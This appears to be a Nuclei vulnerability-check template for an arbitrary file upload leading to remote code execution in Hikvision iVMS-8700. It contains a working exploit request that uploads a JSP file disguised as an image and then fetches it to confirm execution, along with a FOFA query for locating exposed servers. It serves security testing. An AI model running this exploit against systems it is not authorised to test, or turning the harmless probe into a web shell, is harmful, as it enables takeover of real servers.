nuclei-templates/http/vulnerabilities/hikvision/hikvision-ivms-file-upload-...

51 lines
1.6 KiB
YAML
Raw Normal View History

id: hikvision-ivms-file-upload-rce
info:
name: Hikvision iVMS-8700 - File Upload Remote Code Execution
author: brucelsone
severity: critical
description: |
Arbitrary file upload vulnerability in HIKVISION iVMS-8700 Integrated Security Management Platform Software allows attackers to upload and execute malicious files, leading to potential unauthorized server control.
reference:
- https://www.wangan.com/p/11v754aceadb994f
- https://cn-sec.com/archives/1828326.html
metadata:
max-request: 2
fofa-query: icon_hash="-911494769"
tags: hikvision,ivms,fileupload,rce,intrusive
variables:
str1: '{{rand_base(6)}}'
str2: '{{rand_base(6)}}'
str3: '<%out.print("{{str2}}");%>'
http:
- raw:
- |
POST /eps/resourceOperations/upload.action HTTP/1.1
Host: {{Hostname}}
User-Agent: MicroMessenger
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
------WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
Content-Type: image/jpeg
{{str3}}
------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
- |
GET /eps/upload/{{res_id}}.jsp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: res_id
json:
- ".data.resourceUuid"
internal: true
matchers:
- type: dsl
dsl:
- body_2 == str2
# digest: 4a0a0047304502210089055b5e6490a37a160393cd47fa330bc79f2383fc6cbcd3f6571fbf43ae5f4f0220460801f2a318cfa57428386d29e972d62c92b11657035633c08171f1fb083146:922c64590222798bb761d5b6d8e72950